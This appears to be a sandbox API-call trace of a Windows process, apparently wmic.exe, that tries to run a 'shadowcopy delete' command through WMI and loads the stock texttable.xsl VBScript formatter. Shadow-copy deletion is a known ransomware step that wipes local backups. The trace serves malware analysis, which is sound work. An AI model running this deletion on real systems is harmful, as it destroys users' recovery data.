lstrlenW (lpString="&") returned 5 [0258.086] lstrlenW (lpString="<") returned 1 [0258.086] lstrlenW (lpString="<") returned 4 [0258.086] lstrlenW (lpString=">") returned 1 [0258.086] lstrlenW (lpString=">") returned 4 [0258.086] lstrlenW (lpString="'") returned 1 [0258.086] lstrlenW (lpString="'") returned 6 [0258.086] lstrlenW (lpString="\"") returned 1 [0258.086] lstrlenW (lpString=""") returned 6 [0258.086] malloc (_Size=0xc) returned 0x88b950 [0258.086] free (_Block=0x88ba28) [0258.086] free (_Block=0x88c358) [0258.086] malloc (_Size=0xc) returned 0x88bae8 [0258.086] malloc (_Size=0x20) returned 0x88c358 [0258.086] memcpy_s (in: _Destination=0x88c358, _DestinationSize=0x1e, _Source=0xa4a0a4, _SourceSize=0x10 | out: _Destination=0x88c358) returned 0x0 [0258.086] lstrlenW (lpString="&") returned 1 [0258.086] lstrlenW (lpString="&") returned 5 [0258.086] lstrlenW (lpString="<") returned 1 [0258.086] lstrlenW (lpString="<") returned 4 [0258.086] lstrlenW (lpString=">") returned 1 [0258.086] lstrlenW (lpString=">") returned 4 [0258.086] lstrlenW (lpString="'") returned 1 [0258.086] lstrlenW (lpString="'") returned 6 [0258.086] lstrlenW (lpString="\"") returned 1 [0258.086] lstrlenW (lpString=""") returned 6 [0258.086] malloc (_Size=0xc) returned 0x88ba40 [0258.086] free (_Block=0x88bae8) [0258.086] free (_Block=0x88c358) [0258.086] malloc (_Size=0xc) returned 0x88bae8 [0258.087] memcpy_s (in: _Destination=0x69f9f4, _DestinationSize=0xe, _Source=0xa4a0a4, _SourceSize=0xc | out: _Destination=0x69f9f4) returned 0x0 [0258.087] lstrlenW (lpString="&") returned 1 [0258.087] lstrlenW (lpString="&") returned 5 [0258.087] lstrlenW (lpString="<") returned 1 [0258.087] lstrlenW (lpString="<") returned 4 [0258.087] lstrlenW (lpString=">") returned 1 [0258.087] lstrlenW (lpString=">") returned 4 [0258.087] lstrlenW (lpString="'") returned 1 [0258.087] lstrlenW (lpString="'") returned 6 [0258.087] lstrlenW (lpString="\"") returned 1 [0258.087] lstrlenW (lpString=""") returned 6 [0258.087] malloc (_Size=0xc) returned 0x88b9e0 [0258.087] free (_Block=0x88bae8) [0258.087] ?Format@CHString@@QAAXPBGZZ () returned 0x4e30054 [0258.087] malloc (_Size=0xc) returned 0x88bae8 [0258.088] ??1CHString@@QAE@XZ () returned 0x1 [0258.088] free (_Block=0x88b9e0) [0258.088] free (_Block=0x88ba40) [0258.088] free (_Block=0x88b950) [0258.088] free (_Block=0x88bbd8) [0258.088] free (_Block=0x88b998) [0258.088] free (_Block=0x88bbf0) [0258.088] free (_Block=0x88bad0) [0258.088] free (_Block=0x88bab8) [0258.088] free (_Block=0x88b980) [0258.088] free (_Block=0x88bc08) [0258.088] free (_Block=0x88b9c8) [0258.088] free (_Block=0x88ba10) [0258.088] free (_Block=0x88bbc0) [0258.088] free (_Block=0x88b938) [0258.088] malloc (_Size=0xc) returned 0x88bb78 [0258.088] SysStringLen (param_1=" shadowcopy deletNQDPDE") returned 0x8d [0258.088] SysStringLen (param_1="root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON") returned 0x173 [0258.088] free (_Block=0x88b9b0) [0258.088] malloc (_Size=0xc) returned 0x88bb60 [0258.089] malloc (_Size=0xc) returned 0x88bbc0 [0258.089] SysStringLen (param_1=" shadowcopy deletNQDPDEroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON") returned 0x200 [0258.089] SysStringLen (param_1="") returned 0xa [0258.089] free (_Block=0x88bb78) [0258.089] free (_Block=0x88bb60) [0258.089] free (_Block=0x88bb90) [0258.089] free (_Block=0x88bb30) [0258.089] free (_Block=0x88bae8) [0258.089] ??1CHString@@QAE@XZ () returned 0x1 [0258.089] malloc (_Size=0xc) returned 0x88bab8 [0258.089] SysStringLen (param_1="") returned 0x0 [0258.089] SysStringLen (param_1="") returned 0x5c [0258.089] free (_Block=0x88ab80) [0258.089] malloc (_Size=0xc) returned 0x88bbd8 [0258.089] SysStringLen (param_1="") returned 0x5c [0258.089] SysStringLen (param_1=" shadowcopy deletNQDPDEroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON") returned 0x20a [0258.089] free (_Block=0x88bab8) [0258.089] WbemLocator:IUnknown:Release (This=0xa39118) returned 0x0 [0258.090] ?Empty@CHString@@QAEXXZ () returned 0x72c565f8 [0258.090] free (_Block=0x88b920) [0258.090] malloc (_Size=0xc) returned 0x88ba28 [0258.090] SysStringLen (param_1="") returned 0x0 [0258.090] SysStringLen (param_1="0x80041014Initialization failure\r\nWMI") returned 0xa0 [0258.090] free (_Block=0x88a9b8) [0258.090] _kbhit () returned 0x0 [0258.797] malloc (_Size=0xc) returned 0x88bbf0 [0258.797] SysStringLen (param_1=" shadowcopy deletNQDPDEroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON") returned 0x266 [0258.797] SysStringLen (param_1="0x80041014Initialization failure\r\nWMI") returned 0xa0 [0258.797] free (_Block=0x88bbd8) [0258.797] malloc (_Size=0xc) returned 0x88ba40 [0258.797] malloc (_Size=0xc) returned 0x88b920 [0258.797] SysStringLen (param_1=" shadowcopy deletNQDPDEroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON0x80041014Initialization failure\r\nWMI") returned 0x306 [0258.797] SysStringLen (param_1="") returned 0xa [0258.797] free (_Block=0x88bbf0) [0258.797] free (_Block=0x88ba40) [0258.797] ApiSetQueryApiSetPresence () returned 0x0 [0258.797] GetCurrentThreadId () returned 0x1838 [0258.797] ??0CHString@@QAE@PBG@Z () returned 0x69fad0 [0258.798] ??YCHString@@QAEABV0@PBG@Z () returned 0x69fad0 [0258.798] lstrlenW (lpString="LIST") returned 4 [0258.798] lstrlenW (lpString="GET") returned 3 [0258.798] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="GET", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1 [0258.798] lstrlenW (lpString="ASSOC") returned 5 [0258.798] lstrlenW (lpString="GET") returned 3 [0258.798] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="GET", cchCount1=3, lpString2="ASSOC", cchCount2=5) returned 3 [0258.798] lstrlenW (lpString="GET") returned 3 [0258.798] lstrlenW (lpString="GET") returned 3 [0258.798] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="GET", cchCount1=3, lpString2="GET", cchCount2=3) returned 2 [0258.798] malloc (_Size=0x20a) returned 0x88b620 [0258.798] GetSystemDirectoryW (in: lpBuffer=0x88b620, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0258.798] free (_Block=0x88b620) [0258.798] malloc (_Size=0xc) returned 0x88b980 [0258.798] malloc (_Size=0xc) returned 0x88bad0 [0258.798] malloc (_Size=0xc) returned 0x88bab8 [0258.798] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0258.798] SysStringLen (param_1="\\wbem\\") returned 0x6 [0258.798] free (_Block=0x88b980) [0258.798] free (_Block=0x88bad0) [0258.798] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0258.798] free (_Block=0x88bab8) [0258.798] malloc (_Size=0xc) returned 0x88bb00 [0258.798] malloc (_Size=0xc) returned 0x88bae8 [0258.798] malloc (_Size=0xc) returned 0x88bab8 [0258.798] malloc (_Size=0xc) returned 0x88ba40 [0258.799] malloc (_Size=0xc) returned 0x88ba10 [0258.799] malloc (_Size=0xc) returned 0x88bad0 [0258.799] lstrlenW (lpString="TABLE") returned 5 [0258.799] lstrlenW (lpString="CSV") returned 3 [0258.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1 [0258.799] lstrlenW (lpString="TABLE") returned 5 [0258.799] lstrlenW (lpString="HFORM") returned 5 [0258.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 1 [0258.799] lstrlenW (lpString="TABLE") returned 5 [0258.799] lstrlenW (lpString="HTABLE") returned 6 [0258.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1 [0258.799] lstrlenW (lpString="TABLE") returned 5 [0258.799] lstrlenW (lpString="LIST") returned 4 [0258.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="TABLE", cchCount2=5) returned 1 [0258.799] lstrlenW (lpString="TABLE") returned 5 [0258.799] lstrlenW (lpString="MOF") returned 3 [0258.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1 [0258.799] lstrlenW (lpString="TABLE") returned 5 [0258.799] lstrlenW (lpString="RAWXML") returned 6 [0258.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1 [0258.799] lstrlenW (lpString="TABLE") returned 5 [0258.799] lstrlenW (lpString="TABLE") returned 5 [0258.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 2 [0258.799] SysStringLen (param_1="texttable.xsl") returned 0xd [0258.799] SysStringLen (param_1="hform.xsl") returned 0x9 [0258.799] SysStringLen (param_1="texttable.xsl") returned 0xd [0258.799] SysStringLen (param_1="htable.xsl") returned 0xa [0258.799] SysStringLen (param_1="texttable.xsl") returned 0xd [0258.799] SysStringLen (param_1="csv.xsl") returned 0x7 [0258.799] SysStringLen (param_1="texttable.xsl") returned 0xd [0258.799] SysStringLen (param_1="mof.xsl") returned 0x7 [0258.799] SysStringLen (param_1="texttable.xsl") returned 0xd [0258.799] SysStringLen (param_1="xml.xsl") returned 0x7 [0258.799] malloc (_Size=0xc) returned 0x88b998 [0258.800] malloc (_Size=0xc) returned 0x88b980 [0258.800] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0258.800] SysStringLen (param_1="\\") returned 0x1 [0258.800] free (_Block=0x88b998) [0258.800] malloc (_Size=0xc) returned 0x88bb48 [0258.800] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\\\") returned 0x1a [0258.800] SysStringLen (param_1="texttable.xsl") returned 0xd [0258.800] free (_Block=0x88b980) [0258.800] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\wbem\\\\texttable.xsl" (normalized: "c:\\windows\\system32\\wbem\\texttable.xsl"), dwDesiredAccess=0x0, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0258.801] CloseHandle (hObject=0x30c) returned 1 [0258.802] malloc (_Size=0x18) returned 0x882b40 [0258.802] malloc (_Size=0x18) returned 0x882b80 [0258.802] ??0CHString@@QAE@PBG@Z () returned 0x69f9e8 [0258.802] ?Right@CHString@@QBE?AV1@H@Z () returned 0x69f9ec [0258.802] ??0CHString@@QAE@PBG@Z () returned 0x69f9f0 [0258.802] _wcsicmp (_String1=".xsl", _String2=".xsl") returned 0 [0258.802] ??1CHString@@QAE@XZ () returned 0x1 [0258.802] ??1CHString@@QAE@XZ () returned 0x1 [0258.802] ??1CHString@@QAE@XZ () returned 0x1 [0258.802] malloc (_Size=0x18) returned 0x882ba0 [0258.802] malloc (_Size=0x10) returned 0x88bb18 [0258.802] malloc (_Size=0x18) returned 0x882c00 [0258.802] free (_Block=0x882ba0) [0258.802] free (_Block=0x882b80) [0258.802] free (_Block=0x882b40) [0258.802] free (_Block=0x88bad0) [0258.802] free (_Block=0x88ba10) [0258.802] free (_Block=0x88ba40) [0258.802] free (_Block=0x88bab8) [0258.802] free (_Block=0x88bae8) [0258.802] free (_Block=0x88bb00) [0258.802] GetCurrentThreadId () returned 0x1838 [0258.802] ??0CHString@@QAE@XZ () returned 0x69fa48 [0258.802] CoCreateInstance (in: rclsid=0xe66ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xe66ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xea8574 | out: ppv=0xea8574*=0x9e4c18) returned 0x0 [0258.804] FreeThreadedDOMDocument:IXMLDOMDocument:loadXML (in: This=0x9e4c18, bstrXML=" shadowcopy deletNQDPDEroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON0x80041014Initialization failure\r\nWMI", isSuccessful=0x69fa58 | out: isSuccessful=0x69fa58*=0xffff) returned 0x0 [0258.805] ??0CHString@@QAE@XZ () returned 0x69f9e4 [0258.805] GetCurrentThreadId () returned 0x1838 [0258.805] malloc (_Size=0x10) returned 0x88ba40 [0258.805] malloc (_Size=0x18) returned 0x882b40 [0258.805] CoCreateInstance (in: rclsid=0xe66ab4*(Data1=0x2933bf94, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), pUnkOuter=0x0, dwClsContext=0x15, riid=0xe66ac4*(Data1=0x2933bf93, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x69f9d0 | out: ppv=0x69f9d0*=0x9e4e08) returned 0x0 [0258.809] CoCreateInstance (in: rclsid=0xe66ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x15, riid=0xe66ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x69f9c8 | out: ppv=0x69f9c8*=0x9e5c28) returned 0x0 [0258.810] FreeThreadedDOMDocument:IXMLDOMDocument:put_async (This=0x9e5c28, async=0) returned 0x0 [0258.810] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\\\texttable.xsl") returned 0x4e [0258.810] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x9e5c28, xmlSource=0x69f8f8*(varType=0x8, wReserved1=0x0, wReserved2=0xf964, wReserved3=0x69, varVal1="C:\\WINDOWS\\system32\\wbem\\\\texttable.xsl", varVal2=0xa20768), isSuccessful=0x69f9dc | out: isSuccessful=0x69f9dc*=0xffff) returned 0x0 [0258.814] XSLTemplate:IXSLTemplate:putref_stylesheet (This=0x9e4e08, stylesheet=0x9e5c28) returned 0x0 [0259.729] malloc (_Size=0x80) returned 0x88bd20 [0259.731] __dllonexit () returned 0x72defb60 [0259.731] __dllonexit () returned 0x72defb70 [0259.731] GetCurrentProcess () returned 0xffffffff [0259.731] K32GetModuleInformation (in: hProcess=0xffffffff, hModule=0x72db0000, lpmodinfo=0x69dc58, cb=0xc | out: lpmodinfo=0x69dc58*(lpBaseOfDll=0x72db0000, SizeOfImage=0x80000, EntryPoint=0x72de4040)) returned 1 [0259.732] __dllonexit () returned 0x72defb80 [0259.732] GetUserDefaultLCID () returned 0x409 [0259.732] GetVersion () returned 0x3ad7000a [0259.733] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x74030000 [0259.733] GetProcAddress (hModule=0x74030000, lpProcName="QueryProtectedPolicy") returned 0x77251cd0 [0259.733] VirtualProtect (in: lpAddress=0x72e1f358, dwSize=0x4, flNewProtect=0x4, lpflOldProtect=0x69dc80 | out: lpflOldProtect=0x69dc80*=0x2) returned 1 [0259.733] VirtualProtect (in: lpAddress=0x72e1f358, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x69dc80 | out: lpflOldProtect=0x69dc80*=0x4) returned 1 [0259.733] DllGetClassObject (in: rclsid=0xa25d54*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x746bfd10*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69e714 | out: ppv=0x69e714*=0x88cad8) returned 0x0 [0259.734] malloc (_Size=0x38) returned 0x88cad8 [0259.735] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0x88cad8, pUnkOuter=0x0, riid=0x69f184*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x69e6fc | out: ppvObject=0x69e6fc*=0x88b620) returned 0x0 [0259.735] malloc (_Size=0x220) returned 0x88b620 [0259.736] LdrResolveDelayLoadedAPI () returned 0x745de580 [0259.736] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x69e690 | out: phkResult=0x69e690*=0x334) returned 0x0 [0259.736] RegQueryValueExW (in: hKey=0x334, lpValueName="AmsiEnable", lpReserved=0x0, lpType=0x69e68c, lpData=0x69e688, lpcbData=0x69e694*=0x4 | out: lpType=0x69e68c*=0x0, lpData=0x69e688*=0x0, lpcbData=0x69e694*=0x4) returned 0x2 [0259.736] GetUserDefaultLCID () returned 0x409 [0259.736] GetACP () returned 0x4e4 [0259.736] LoadLibraryExW (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x800) returned 0x72da0000 [0259.747] GetProcAddress (hModule=0x72da0000, lpProcName="AmsiInitialize") returned 0x72da3dd0 [0259.748] GetProcAddress (hModule=0x72da0000, lpProcName="AmsiScanString") returned 0x72da4170 [0259.748] AmsiInitialize () returned 0x0 [0259.990] VBScriptEngine5:IUnknown:AddRef (This=0x88b620) returned 0x2 [0259.990] VBScriptEngine5:IUnknown:Release (This=0x88b620) returned 0x1 [0259.990] VBScriptEngine5:IUnknown:Release (This=0x88cad8) returned 0x0 [0259.990] free (_Block=0x88cad8) [0259.990] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x88b620, riid=0x736df0c0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x69f62c | out: ppvObject=0x69f62c*=0x88b620) returned 0x0 [0259.990] VBScriptEngine5:IUnknown:Release (This=0x88b620) returned 0x1 [0259.990] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x88b620, riid=0x736df0b0*(Data1=0xbb1a2ae2, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x319c9ec | out: ppvObject=0x319c9ec*=0x88b624) returned 0x0 [0259.990] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x88b620, riid=0x736d4f50*(Data1=0xcb5bdc81, Data2=0x93c1, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x69f648 | out: ppvObject=0x69f648*=0x88b650) returned 0x0 [0259.994] VBScriptEngine5:IActiveScript:SetScriptSite (This=0x88b620, pass=0x9e5fc0) returned 0x0 [0259.994] GetCurrentThreadId () returned 0x1838 [0259.994] malloc (_Size=0xb4) returned 0x88bda8 [0259.994] GetCurrentThreadId () returned 0x1838 [0259.994] malloc (_Size=0x14) returned 0x882b80 [0259.994] malloc (_Size=0x20) returned 0x88c358 [0259.994] malloc (_Size=0x7c) returned 0x88dfe8 [0259.994] malloc (_Size=0x1c) returned 0x88c3d0 [0259.994] GetCurrentThreadId () returned 0x1838 [0259.994] malloc (_Size=0x44) returned 0x88be68 [0259.995] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x9e5fc0, riid=0x72db60c8*(Data1=0x539698a0, Data2=0xcdca, Data3=0x11cf, Data4=([0]=0xa5, [1]=0xeb, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x47, [6]=0xa0, [7]=0x63)), ppvObject=0x88e040 | out: ppvObject=0x88e040*=0x0) returned 0x80004002 [0259.995] VBScriptEngine5:IUnknown:AddRef (This=0x9e5fc0) returned 0x2 [0259.995] IActiveScriptSite:GetLCID (in: This=0x9e5fc0, plcid=0x69f628 | out: plcid=0x69f628*=0x409) returned 0x0 [0259.996] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0259.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x69f5fc, cchData=6 | out: lpLCData="1252") returned 5 [0259.996] IsValidCodePage (CodePage=0x4e4) returned 1 [0259.996] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x9e5fc0, riid=0x72db5058*(Data1=0x51973c11, Data2=0xcb0c, Data3=0x11d0, Data4=([0]=0xb5, [1]=0xc9, [2]=0x0, [3]=0xa0, [4]=0x24, [5]=0x4a, [6]=0xe, [7]=0x7a)), ppvObject=0x88b7b8 | out: ppvObject=0x88b7b8*=0x9e5fd4) returned 0x0 [0259.996] VBScriptEngine5:IActiveScriptSiteDebug32:GetApplication (in: This=0x9e5fd4, ppda=0x88b7c0 | out: ppda=0x88b7c0*=0x0) returned 0x80004001 [0259.996] LdrResolveDelayLoadedAPI () returned 0x74737490 [0259.997] CoCreateInstance (in: rclsid=0x72db60e8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x72db60b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x88b808 | out: ppv=0x88b808*=0xa26e10) returned 0x0 [0259.997] IUnknown:AddRef (This=0xa26e10) returned 0x2 [0259.997] GetCurrentProcessId () returned 0x1834 [0259.997] GetCurrentThreadId () returned 0x1838 [0259.997] GetTickCount () returned 0x1190b92 [0259.997] ISystemDebugEventFire:BeginSession (This=0xa26e10, guidSourceID=0x72db60d8, strSessionName="VBScript:00006196:00006200:18418578") returned 0x0 [0259.997] QueryProtectedPolicy (in: PolicyGuid=0x72db52b0, PolicyValue=0x69f620 | out: PolicyValue=0x69f620) returned 0 [0259.997] IActiveScriptSite:OnStateChange (This=0x9e5fc0, ssScriptState=5) returned 0x0 [0259.998] VBScriptEngine5:IActiveScriptParse32:ParseScriptText (in: This=0x88b624, pstrCode="\nOption Explicit\n'This stylesheet formats DMTF XML encoded CIM objects into a tabular\n'format using carriage returns and space characters only.\nDim sPXML\nDim propname(128)\nDim lenarr(128)\nDim bN(128)\nDim iLens\nDim iLensMax\nDim propvalue(2048, 128)\nDim iRow\niRow = -1 \nDim iResultCount\nFunction CountResults(n)\n iResultCount = iResultCount + 1\nEnd Function\nFunction PadIt(ilen)\n Dim i\n Dim pads\n i = ilen + 2\n pads = \" \"\n while (i > len(pads))\n\x09pads = pads & pads\n wend\n PadIt = Left(pads, i)\nEnd Function\nFunction GotInstance()\n iLensMax = iLens\n iLens = 0\n iRow = iRow + 1\nEnd Function\nFunction GetValues(n)\n Dim child, iNum, i, strType\n If iRow = 0 Then\n 'this is the first row - set up the headers\n propname(iLens) = Me.Attributes.GetNamedItem(\"NAME\").Value\n Else\n If propname(iLens) <> Me.Attributes.GetNamedItem(\"NAME\").Value Then\n 'This is going to be messy - Find it or add it on the end\n End If\n End If\n If strcomp(Me.NodeName,\"Property.Array\",1) = 0 Then\n\x09if (Me.hasChildNodes) then\n\x09\x09propvalue(iRow, iLens) = \"{\"\n\x09\x09iNum = Me.FirstChild.ChildNodes.Length\n\x09\x09i = 1\n\x09\x09strType = Me.attributes.getNamedItem(\"TYPE\").nodeValue\n\x09\x09For each child in Me.FirstChild.ChildNodes\n\x09\x09 if (strType = \"string\") then\n\x09\x09 propvalue(iRow, iLens) = propvalue(iRow, iLens) & \"\"\"\" & child.nodeTypedValue & \"\"\"\"\n\x09\x09 elseif (strType = \"char16\") then\n\x09 \x09propvalue(iRow, iLens) = propvalue(iRow, iLens) & \"'\" & child.nodeTypedValue & \"'\"\n\x09\x09 else\n\x09\x09 propvalue(iRow, iLens) = propvalue(iRow, iLens) & child.nodeTypedValue\n\x09\x09 end if\n\x09\x09 if (i <> iNum) then\n \x09\x09propvalue(iRow, iLens) = propvalue(iRow, iLens) & \", \"\n\x09\x09 end if\n\x09\x09 i = i + 1\n\x09\x09Next\n\x09\x09propvalue(iRow, iLens) = propvalue(iRow, iLens) & \"}\"\n\x09end if\n ElseIf strcomp(Me.NodeName,\"Property.Reference\",1) = 0 Then\n\x09dim valref, node, hostnode, localnamespace, namespacenode, keybindings, keybinding\n\x09for each valref in Me.selectNodes(\"VALUE.REFERENCE\")\n\x09\x09for each node in valref.selectNodes(\".//NAMESPACEPATH\")\n\x09\x09\x09set hostnode = node.selectsinglenode(\"HOST\")\n\x09\x09\x09if not hostnode is nothing then\n\x09\x09\x09\x09propvalue(irow, ilens) = \"\\\\\" & hostnode.text\n\x09\x09\x09end if\n\x09\x09\x09set localnamespace = node.selectsinglenode(\"LOCALNAMESPACEPATH\")\n\x09\x09\x09if not localnamespace is nothing then\n\x09\x09\x09\x09for each namespacenode in localnamespace.selectnodes(\"NAMESPACE\")\n\x09\x09\x09\x09\x09propvalue(irow,ilens) = propvalue(irow,ilens) & \"\\\" & namespacenode.attributes.getNamedItem(\"NAME\").nodeValue\n\x09\x09\x09\x09next\n\x09\x09\x09end if\n\x09\x09\x09propvalue(irow,ilens) = propvalue(irow,ilens) & \":\"\n\x09\x09next\n\x09\x09for each node in valref.selectNodes(\".//INSTANCENAME\")\n\x09\x09\x09propvalue(irow,ilens) = propvalue(irow,ilens) & node.attributes.getNamedItem(\"CLASSNAME\").nodevalue\n\x09\x09\x09set keybindings = node.selectnodes(\"KEYBINDING\")\n\x09\x09\x09i = 0\n\x09\x09\x09for each keybinding in keybindings\n\x09\x09\x09\x09i = i + 1\n\x09\x09\x09\x09if (i = 1) then\n\x09\x09\x09\x09\x09propvalue(irow,ilens) = propvalue(irow,ilens) & \".\" \n\x09\x09\x09\x09end if\n\x09\x09\x09\x09propvalue(irow,ilens) = propvalue(irow,ilens) & keybinding.attributes.getnameditem(\"NAME\").nodeValue & \"=\"\"\" & _\n\x09\x09\x09\x09\x09keybinding.selectsinglenode(\"KEYVALUE\").text & \"\"\"\"\n\x09\x09\x09\x09if (i <> keybindings.length) then\n\x09\x09\x09\x09\x09propvalue(irow,ilens) = propvalue(irow,ilens) & \",\"\n\x09\x09\x09\x09end if\n\x09\x09\x09next\n\x09\x09next\n\x09next\x09\x09\n Else\n\x09propvalue(iRow, iLens) = replace(replace(Me.nodeTypedValue, vbCr, \"\"), vbLF, \"\")\n End If\n iLens = iLens + 1\nEnd Function\nFunction DisplayValues(n)\n Dim sT\n Dim sV\n Dim i\n Dim j\n Dim k\n 'Determine the column widths\n 'look at the column headers first\n iLensMax = iLens\n iLens = 0\n iRow = iRow + 1\n i = 0\n While i < iLensMax\n k = getlength(propname(i))\n If k > lenarr(i) Then\n lenarr(i) = k\n End If\n i = i + 1\n Wend\n 'look at the values\n i = 0\n While i < iRow\n j = 0\n While j < iLensMax\n k = getlength(propvalue(i, j))\n If k > lenarr(j) Then\n lenarr(j) = k\n End If\n j = j + 1\n Wend\n i = i + 1\n Wend\n 'set up the column headers\n i = 0\n While i < iLensMax\n j = lenarr(i) - getlength(propname(i))\n sT = sT & propname(i) & PadIt(j)\n i = i + 1\n Wend\n i = 0\n While i < iRow\n j = 0\n While j < iLensMax\n k = lenarr(j) - getlength(propvalue(i, j))\n\x09 if bN(j)= 1 then\n sV = sV & PadIt(k-2) & propvalue(i, j) & \" \"\n\x09 Else\n sV = sV & propvalue(i, j) & PadIt(k)\n\x09 End If\n j = j + 1\n Wend\n sV = sV & vbCrLf\n i = i + 1\n Wend\n DisplayValues = sT & vbCrLf & sV\nEnd Function\nFunction GetLength(str)\n\x09Dim i, ch\n\x09'we have to manually compute length\n\x09GetLength = 0\n\x09For i = 1 to len(str)\n\x09\x09ch = ascw(mid(str,i,1))\n\x09\x09if (ch > 255) or (ch < 0) 